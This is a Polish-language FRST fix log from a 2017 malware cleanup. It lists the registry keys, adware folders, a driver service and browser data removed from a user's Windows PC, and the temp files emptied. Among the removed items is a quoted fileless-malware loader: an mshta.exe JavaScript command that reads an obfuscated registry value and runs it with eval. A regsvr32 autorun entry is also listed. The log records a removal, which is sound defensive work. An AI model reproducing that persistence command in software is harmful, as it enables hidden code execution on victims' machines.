Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 15-03-2017 Uruchomiony przez rober (13-04-2017 11:40:31) Run:6 Uruchomiony z C:\Users\rober\Downloads Załadowane profile: rober (Dostępne profile: Paweł & rober) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [] 1 HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\Run: [Ibsoft] => regsvr32.exe C:\Users\rober\AppData\Local\Ibsoft\bassTrust.dll <===== UWAGA ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => -> Brak pliku SearchScopes: HKU\S-1-5-21-3797074174-2719608703-2427757124-1057 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Tooltony\Application\chrome.exe <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Tooltony S3 dbx; system32\DRIVERS\dbx.sys [X] HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartupApproved\Run: => "YSPack" HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\Software\Classes\929e3: "C:\WINDOWS\system32\mshta.exe" "javascript:obxi5j9TR="QqmpimHi";dr6=new ActiveXObject("WScript.Shell");xvaC4eb2="I";Yng82J=dr6.RegRead("HKCU\\software\\aurgjr\\aclehngaac");Z4ob1mPdd="34b";eval(Yng82J);tHKOs1T="pxl0QBT";" <===== UWAGA C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cygwin\Cygwin64 Terminal.lnk C:\Users\rober\AppData\Roaming\Microsoft\Excel\Kopia_Kopia_Lista_termin_0_oceny_koncowe305858052441186973\Kopia_Kopia_Lista_termin_0_oceny_koncowe.xls.lnk C:\Users\rober\AppData\Roaming\Microsoft\Excel\KALKULATOR%20DOCHODU305849803376288589\KALKULATOR%20DOCHODU.xls.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\rober\AppData\Local\Mozilla C:\Users\rober\AppData\Roaming\Mozilla C:\Users\rober\AppData\Roaming\Profiles C:\Program Files (x86)\Mozilla Firefox C:\ProgramData\Mozilla Reg: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt /s FindFolder: *Tooltony*;*Ibsoft* EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Błąd: (0) Nie udało się utworzyć punktu przywracania. HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\ => Wartość pomyślnie usunięto HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\Software\Microsoft\Windows\CurrentVersion\Run\\Ibsoft => Wartość pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0PerformanceMonitor => klucz pomyślnie usunięto HKCR\CLSID\{3B5B973C-92A4-4855-9D3F-0F3D23332208} => klucz nie znaleziono. HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto "C:\Program Files (x86)\Tooltony" => nie znaleziono. HKLM\System\CurrentControlSet\Services\dbx => klucz pomyślnie usunięto dbx => serwis pomyślnie usunięto HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\YSPack => Wartość pomyślnie usunięto HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\YSPack => Wartość nie znaleziono. HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\Software\Classes\929e3 => klucz pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cygwin\Cygwin64 Terminal.lnk => pomyślnie przeniesiono C:\Users\rober\AppData\Roaming\Microsoft\Excel\Kopia_Kopia_Lista_termin_0_oceny_koncowe305858052441186973\Kopia_Kopia_Lista_termin_0_oceny_koncowe.xls.lnk => pomyślnie przeniesiono C:\Users\rober\AppData\Roaming\Microsoft\Excel\KALKULATOR%20DOCHODU305849803376288589\KALKULATOR%20DOCHODU.xls.lnk => pomyślnie przeniesiono HKCU\Software\Mozilla => klucz pomyślnie usunięto HKCU\Software\MozillaPlugins => klucz nie znaleziono. HKLM\SOFTWARE\Mozilla => klucz pomyślnie usunięto HKLM\SOFTWARE\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Mozilla => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\mozilla.org => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => klucz pomyślnie usunięto C:\Users\rober\AppData\Local\Mozilla => pomyślnie przeniesiono C:\Users\rober\AppData\Roaming\Mozilla => pomyślnie przeniesiono C:\Users\rober\AppData\Roaming\Profiles => pomyślnie przeniesiono C:\Program Files (x86)\Mozilla Firefox => pomyślnie przeniesiono "C:\ProgramData\Mozilla" => nie znaleziono. ========= reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt /s ========= HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt DisplayName REG_SZ @%Systemroot%\system32\wbem\wmisvc.dll,-205 ErrorControl REG_DWORD 0x0 ImagePath REG_EXPAND_SZ %systemroot%\system32\svchost.exe -k netsvcs Start REG_DWORD 0x2 Type REG_DWORD 0x20 Description REG_SZ @%Systemroot%\system32\wbem\wmisvc.dll,-204 DependOnService REG_MULTI_SZ RPCSS ObjectName REG_SZ localSystem ServiceSidType REG_DWORD 0x1 FailureActions REG_BINARY 805101000000000000000000030000001400000001000000C0D4010001000000E09304000000000000000000 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt\Parameters ServiceDll REG_EXPAND_SZ %SystemRoot%\system32\wbem\WMIsvc.dll ServiceDllUnloadOnStop REG_DWORD 0x1 ServiceMain REG_SZ ServiceMain ========= Koniec Reg: ========= ================== FindFolder: "*Tooltony*;*Ibsoft*" =================== Brak pliku === Koniec FindFolder === =========== EmptyTemp: ========== BITS transfer queue => 32768 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 65541153 B Java, Flash, Steam htmlcache => 1904 B Windows/system/drivers => 154635619 B Edge => 1530880 B Chrome => 366873593 B Firefox => 0 B Opera => 28772688 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 128 B systemprofile32 => 128 B LocalService => 51074 B NetworkService => 2636 B xxx => 0 B Paweł => 20490009 B rober => 2486734555 B RecycleBin => 0 B EmptyTemp: => 2.9 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 11:43:17 ====